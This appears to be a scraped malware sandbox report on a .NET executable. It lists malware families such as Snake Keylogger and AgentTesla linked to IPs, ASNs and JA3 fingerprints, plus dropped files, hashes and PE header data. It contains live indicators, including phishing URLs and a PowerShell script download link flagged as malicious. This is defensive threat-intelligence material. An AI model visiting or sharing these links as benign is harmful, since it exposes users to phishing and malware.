	RFQ_List.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
api.telegram.org	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	swift-copy31072024PDF.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fedex.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	na.doc	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	swift-copy31072024PDF.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Fedex.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	z45paymentadvice.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	rFa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	CQlUZ4KuAa.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	104.21.74.191
	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	Bill_Of _Lading.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ST007 SWIFT CONFIRMATION.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	swift-copy31072024PDF.html	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	ST007 SWIFT CONFIRMATION.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	ST007 SWIFT CONFIRMATION.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	Transferencia.doc	Get hash	malicious	Quasar	Browse	188.114.96.3
ORACLE-BMC-31898US	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	144.25.107.42
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	130.61.64.122
	splarm7.elf	Get hash	malicious	Unknown	Browse	147.154.235.35
	splx86.elf	Get hash	malicious	Unknown	Browse	140.204.109.171
	nklx86.elf	Get hash	malicious	Unknown	Browse	138.1.114.108
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Bill Of Lading.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	dekont_001.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVe	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1JRNFh_1Cbzym_iLfw5aw8-eo7G0EKRf1L0-MpuWvb2k/preview?pli=1MiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqG	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWl	Get hash	malicious	Mamba2FA	Browse	188.114.97.3
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	Bill_Of _Lading.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	IGNM2810202400017701_270620240801_546001.vbs	Get hash	malicious	GuLoader	Browse	149.154.167.220
	https://clairecarpenter.com/wp-includes/css/pbcmc.php?7112797967704b536932307466507a4373757943784b5463314a54533470796b784f7a456e567130725553383750315338317430677031416341#Email#	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.220
	https://filerit.com/pi-240924.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	JVLkkfzSKW.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.220
	Shipping documents 00029399400059.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Quasar, Stealc	Browse	149.154.167.220
	z20SWIFT_MT103_Payment_552016_pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	https://mail.kb4.io/XT0VNMzRJS3djRnBKZnFha1JaVThBUHFHRmpuS2FmSUY4aUszUlY3Sm0rWmpyUWR3ekQzL2xjN0xhVVJlTzhvZzgyMGtTUkxmSWtGdWlUY2I0NStmRWlLS2xHcGZsNTZUN3VyanNiKzVaNjhaeTRSTXFXVGdwc0J4amUxRFFPMU5DTTd5ejl5aXZxUlBwL1NDaDBRSk9DWVJkc09KRUZodTl0SFh5bFVVWEdYZTMzcm5ZTCtCSGpmZWRIMEprQjhiZExvOE9wSGkwUS9KTjQwSVdjQT0tLVBNYWNLTzcyT0xCdDkzb3ItLURlVmNvdGI3d3BGenM5UWJzc1EreXc9PQ==?cid=2260646675	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\M2AB8BeHc4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379828835936797
Encrypted:	false
SSDEEP:	48:tWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZMtUyus:tLHxvCsIfA2KRHmOugras
MD5:	D0708DD1015D394D5B0E6ABAD82C3A83
SHA1:	57BD59F899CE3D4BFF0F4DF07A4E33F887653C64
SHA-256:	3B646F2060C73C79856182721261A4C1968BA4CCF0BBF68EFBB00C704DD511F8
SHA-512:	A5D40780A1A33BA642DE3668CC15DC8A407FD1B36D6876963F664DB44ADAEB1CAB72EED3BDD9F5AA8F59DE4924F669B69CB01B63A99788C0D9834AB836DE162E
Malicious:	false
Reputation:	low
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3k1nbs3.lsl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jizkrf2i.hpm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qks2qhqx.nu2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x20j5onh.12m.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.490829116609295
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	M2AB8BeHc4.exe
File size:	983'040 bytes
MD5:	cd437678986f11ba11e754bb1153f9a0
SHA1:	24fe760f960ce0653d014fa5348decfae1918f13
SHA256:	548c158482e4cc2f2b6c931c92f66dc70a0e35c8a8031709249f8634e10e0108
SHA512:	78eb44e2c9b64ecaf87875ce4aff4dc97bc84e4706f56ff263066e138fbaf5cd0cbf4b4eb63deb82413d20bd9eb2b6b3f468d4e7ba127ba640ff5163ba615a1c
SSDEEP:	12288:yAgyHUPF5kLOj/+wwFSNS5nc1QB1RXS5g4TdXjFjwQvqZywZfsMl37qYjyndWVrt:hUPQk+wwFS85nc1Qp4gWdpkQEP7oS6w
TLSH:	EC257CEC32203BAFCA5AD431D555CCB49770296A730AB59250DB239F360C762FE18AD7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m2 g..............0......L......>.... ........@.. .......................`............@................................

File Icon


Icon Hash:	0082c20149000000

Static PE Info

General

Entrypoint:	0x4ed13e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6720326D [Tue Oct 29 00:55:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xed0e4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xee000	0x4880	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
